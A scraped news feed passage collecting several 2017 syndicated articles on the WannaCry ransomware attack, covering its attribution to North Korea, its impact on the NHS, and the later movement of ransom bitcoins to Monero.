Following the ransomware attack, speculation emerged that North Korea may have played a significant role in the hack. Neel Mehta, a prominent Google security researcher, revealed a resemblance between the code used in what is said to be an early version of WannaCry ransomware, and that of a hacking tool attributed to the notorious Lazarus Group in a Twitter post.

Let’s block ads! (Why?)

RT – Daily news

]]>
https://briefnews.eu/show-us-the-evidence-n-korea-invites-us-to-prove-pyongyangs-wannacry-connection/feed/ 0
U.S. blames North Korea for WannaCry ransomware attack https://briefnews.eu/u-s-blames-north-korea-for-wannacry-ransomware-attack/ https://briefnews.eu/u-s-blames-north-korea-for-wannacry-ransomware-attack/#respond Tue, 19 Dec 2017 05:54:47 +0000 http://briefnews.eu/u-s-blames-north-korea-for-wannacry-ransomware-attack/


(Reuters) — The Trump administration has publicly blamed North Korea for unleashing the so-called WannaCry cyber attack that crippled hospitals, banks and other companies across the globe earlier this year.

“The attack was widespread and cost billions, and North Korea is directly responsible,” Tom Bossert, homeland security adviser to President Donald Trump, wrote in a piece published on Monday night in the Wall Street Journal.

“North Korea has acted especially badly, largely unchecked, for more than a decade, and its malicious behavior is growing more egregious,” Bossert wrote. “WannaCry was indiscriminately reckless.”

The White House was expected to follow up on Tuesday with a more formal statement blaming Pyongyang, according to a senior administration official.

The U.S. government has assessed with a “very high level of confidence” that a hacking entity known as Lazarus Group, which works on behalf of the North Korean government, carried out the WannaCry attack, said the official, who spoke on condition of anonymity to discuss details of the government’s investigation.

Lazarus Group is widely believed by security researchers and U.S. officials to have been responsible for the 2014 hack of Sony Pictures Entertainment that destroyed files, leaked corporate communications online and led to the departure of several top studio executives.

North Korean government representatives could not be immediately reached for comment. The country has repeatedly denied responsibility for WannaCry and called other allegations about cyber attacks a smear campaign.

Washington’s public condemnation does not include any indictments or name specific individuals, the administration official said, adding the shaming was designed to hold Pyongyang accountable for its actions and “erode and undercut their ability to launch attacks.”

The accusation comes as worries mount about North Korea’s hacking capabilities and its nuclear weapons program.

‘Pattern of Misbehaving’

Many security researchers, including the cyber firm Symantec , as well as the British government, have already concluded that North Korea was likely behind the WannaCry attack, which quickly unfurled across the globe in May to infect more than 300,000 computers in 150 countries.

Considered unprecedented in scale at the time, WannaCry knocked British hospitals offline, forcing thousands of patients to reschedule appointments and disrupted infrastructure and businesses around the world.

The attack originally looked like a ransomware campaign, where hackers encrypt a targeted computer and demand payment to recover files. Some experts later concluded the ransom threat may have been a distraction intended to disguise a more destructive intent.

FedEx’s computer networks were among the most heavily hit. The international shipper said in September it expected to sustain a $ 300 million profit hit as a result of the attack.

Some researchers have said they believed WannaCry was deployed accidentally by North Korea as hackers were developing the code. The senior administration official declined to comment about whether U.S. intelligence was able to discern if the attack was deliberate.

“What we see is a continued pattern of North Korea misbehaving, whether destructive cyber attacks, hacking for financial gain, or targeting infrastructure around the globe,” the official said.

WannaCry was made possible by a flaw in Microsoft’s Windows software, which was discovered by the U.S. National Security Agency and then used by the NSA to build a hacking tool for its own use.

In a devastating NSA security breach, that hacking tool and others were published online by the Shadow Brokers, a mysterious group that regularly posts cryptic taunts toward the U.S. government.

The fact that WannaCry was made possible by the NSA led to sharp criticism from Microsoft President Brad Smith and others who believe the NSA should disclose vulnerabilities it finds so that they can be fixed, rather then hoarding that knowledge to carry out attacks.

Smith said WannaCry provided “yet another example of why the stockpiling of vulnerabilities by governments is such a problem.”

U.S. officials have pushed back on those assertions, saying the administration discloses most computer flaws that government agencies detect.

Last month, the White House published its rules for deciding whether to disclose cyber security flaws or keep them secret as part of an effort to be more transparent about the inter-agency process involved in weighing disclosure.

VentureBeat

]]>
https://briefnews.eu/u-s-blames-north-korea-for-wannacry-ransomware-attack/feed/ 0
‘Basic IT security’ could have prevented UK NHS WannaCry attack https://briefnews.eu/basic-it-security-could-have-prevented-uk-nhs-wannacry-attack/ https://briefnews.eu/basic-it-security-could-have-prevented-uk-nhs-wannacry-attack/#respond Fri, 27 Oct 2017 07:48:28 +0000 http://briefnews.eu/basic-it-security-could-have-prevented-uk-nhs-wannacry-attack/

England’s National Health Service (NHS) could have avoided the ransomware hack that crippled its systems in May, according to a government report. “Basic IT security” was all that was required to prevent the “unsophisticated” WannaCry attack, which affected more than a third of NHS organizations, said the National Audit Office (NAO). The full scale of the incident saw over 19,000 medical appointments canceled, and computers at 600 surgeries locked down.

The attack didn’t stop with the NHS, instead spreading to computers around the globe. Victims were confronted with a message on their machines declaring that their data had been encrypted, and could only be accessed if they forked out $ 300 (sent via bitcoin). The infection used a computer exploit, known as “ETERNALBLUE,” developed by the National Security Agency (NSA), and leaked online by hacking group The Shadow Brokers. Although, the hackers reportedly managed to extort more than $ 100,000 using the malware, it seems the NHS didn’t hand over a single penny. But, the overarching cost of the disruption may never come to light.

Still, the attack could have been prevented if the NHS had followed simple cybersecurity measures, suggested the NAO. It had repeatedly been warned to “migrate” away from old Windows XP software, which was susceptible to the hack. And, in March and April, NHS Digital issued more warnings to organizations to patch the bug in their systems that later allowed WannaCry to spread. A cybersecurity assessment was conducted on 88 out of 236 NHS organizations, and none had passed, said the NAO.

The WananCry virus was accidentally stopped by security researcher Marcus Hutchins using a domain-based kill switch. But, not before it affected a number of big-name companies, including FedEx, Renault, Telefonica, and even Germany’s railway system. Since then, two more ransomwares have sprung up: NotPetya started in Ukraine in June and quickly spread worldwide, and Bad Rabbit plagued parts of Europe and Russia earlier this week.

Source: National Audit Office

Engadget RSS Feed

]]>
https://briefnews.eu/basic-it-security-could-have-prevented-uk-nhs-wannacry-attack/feed/ 0
N. Korea stole cyber tools from NSA, carried out WannaCry ransomware attack – Microsoft chief https://briefnews.eu/n-korea-stole-cyber-tools-from-nsa-carried-out-wannacry-ransomware-attack-microsoft-chief/ https://briefnews.eu/n-korea-stole-cyber-tools-from-nsa-carried-out-wannacry-ransomware-attack-microsoft-chief/#respond Sat, 14 Oct 2017 13:11:20 +0000 http://briefnews.eu/n-korea-stole-cyber-tools-from-nsa-carried-out-wannacry-ransomware-attack-microsoft-chief/

The head of Microsoft accused North Korea of carrying out the WannaCry cyberattack which crippled 200,000 computers in 150 countries earlier in 2017. Pyongyang used “cyber tools or weapons stolen from the NSA,” the company’s president believes.

Microsoft President Brad Smith told ITV that he believed “with great confidence” that North Korea was behind the worldwide WannaCry cyberattack. 

READ MORE: WannaCry hackers have not withdrawn any ransom bitcoin, surveillance shows

“I think at this point that all observers in the know have concluded that WannaCry was caused by North Korea using cyber tools or weapons that were stolen from the National Security Agency in the United States,” Smith said. 

Read more

© Silas Stein / DPA / Global Look Press

According to Smith, over the last six months the world has “seen threats come to life… in new and more serious way.”

“We need governments to come together as they did in Geneva in 1949 and adopt a new digital Geneva Convention that makes clear that these cyber-attacks against civilians, especially in times of peace, are off-limits and a violation of international law,” he added.

There has been speculation that North Korea may have played a significant role in the WannaCry ransomware attack in May. Shortly after the hack, Neel Mehta, a prominent Google security researcher, revealed a resemblance between the code used in what is said to be an early version of WannaCry ransomware, and that in a hacker tool attributed to the notorious Lazarus Group in a Twitter post.

Russian cyber security firm Kaspersky Lab explained in a blog post that Mehta drew parallels between “a WannaCry cryptor sample from February 2017” and “a Lazarus APT [Advanced Persistent Threat] group sample from February 2015.”

The Lazarus Group is believed to be behind high-profile hacking attacks on SWIFT servers of banks, including an attempt to steal $ 851 million from Bangladesh Central Bank in February 2016.

However, Kaspersky researches said that the apparent use by the WannaCry attackers of similar code is not enough to come to definitive conclusions about its origin, as there is the possibility of it being a false flag operation.

READ MORE: Putin: Malware created by intelligence services can backfire on its creators

“Attribution can always be faked, as it’s only a matter of moving bytes around,” another renowned researcher, Matthieu Suiche from Comae Technologies, said at that time, as cited by Cyberscoop. 

In May, a South Korean government-commissioned report produced by the Financial Security Institute (FSI) said that North Korea was responsible for the attack on Sony’s entertainment business in 2014, which erased vast amounts of data while disseminating emails and personal data of employees, in addition to leaking pirated copies of upcoming film releases.

Let’s block ads! (Why?)

RT – Daily news

]]>
https://briefnews.eu/n-korea-stole-cyber-tools-from-nsa-carried-out-wannacry-ransomware-attack-microsoft-chief/feed/ 0
Researchers say WannaCry operator moved bitcoins to “untraceable” Monero https://briefnews.eu/researchers-say-wannacry-operator-moved-bitcoins-to-untraceable-monero/ https://briefnews.eu/researchers-say-wannacry-operator-moved-bitcoins-to-untraceable-monero/#respond Sat, 05 Aug 2017 04:59:51 +0000 http://briefnews.eu/researchers-say-wannacry-operator-moved-bitcoins-to-untraceable-monero/

Enlarge (credit: Monero)

When the master or masters of the WannaCry cryptoransomware worm emptied the bitcoin wallets associated with the malware earlier this week, they apparently did so to make future movement of the funds more anonymous. According to researchers at the Italian information security firm Neutrino, the bitcoin were exchanged for XMR, the “untraceable” private digital currency backed by Monero.

On Wednesday, the 52.2 bitcoins in the wallet were drained out over nine transactions, as detected by a bot created by Quartz’s Keith Collins. Neutrino researchers traced the moved bitcoins to wallets associated with Monero.

Monero is a private digital currency that is focused on anonymity. While it is based on blockchain like other cryptocurrencies and uses distributed consensus for all transactions to prevent wallet hacking, it uses “ring signatures”—an anonymous cryptographic signature scheme—to sign transactions. This makes it impossible to tell which parties were involved in a transaction when examining the blockchain itself.

Read 2 remaining paragraphs | Comments

Ars Technica

]]>
https://briefnews.eu/researchers-say-wannacry-operator-moved-bitcoins-to-untraceable-monero/feed/ 0